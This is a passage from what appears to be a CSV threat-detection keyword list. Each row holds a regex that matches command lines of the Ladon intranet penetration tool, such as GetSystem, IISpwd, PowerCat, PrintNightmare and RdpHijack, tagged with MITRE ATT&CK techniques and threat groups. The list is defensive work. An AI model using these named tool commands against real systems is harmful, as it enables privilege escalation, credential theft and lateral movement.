CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50731" "*Ladon GetDomainIP*",".{0,1000}Ladon\sGetDomainIP.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50732" "*Ladon gethtml *",".{0,1000}Ladon\sgethtml\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50733" "*Ladon GetPipe*",".{0,1000}Ladon\sGetPipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50734" "*Ladon GetSystem*",".{0,1000}Ladon\sGetSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50735" "*Ladon IISdoor*",".{0,1000}Ladon\sIISdoor.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50736" "*Ladon IISpwd*",".{0,1000}Ladon\sIISpwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50737" "*Ladon MssqlCmd *",".{0,1000}Ladon\sMssqlCmd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50738" "*Ladon netsh *",".{0,1000}Ladon\snetsh\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50739" "*Ladon noping *",".{0,1000}Ladon\snoping\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50740" "*Ladon Open3389*",".{0,1000}Ladon\sOpen3389.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50741" "*Ladon PowerCat *",".{0,1000}Ladon\sPowerCat\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50742" "*Ladon PrintNightmare*",".{0,1000}Ladon\sPrintNightmare.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50743" "*Ladon psexec*",".{0,1000}Ladon\spsexec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50744" "*Ladon QueryAdmin*",".{0,1000}Ladon\sQueryAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50745" "*Ladon RdpHijack*",".{0,1000}Ladon\sRdpHijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
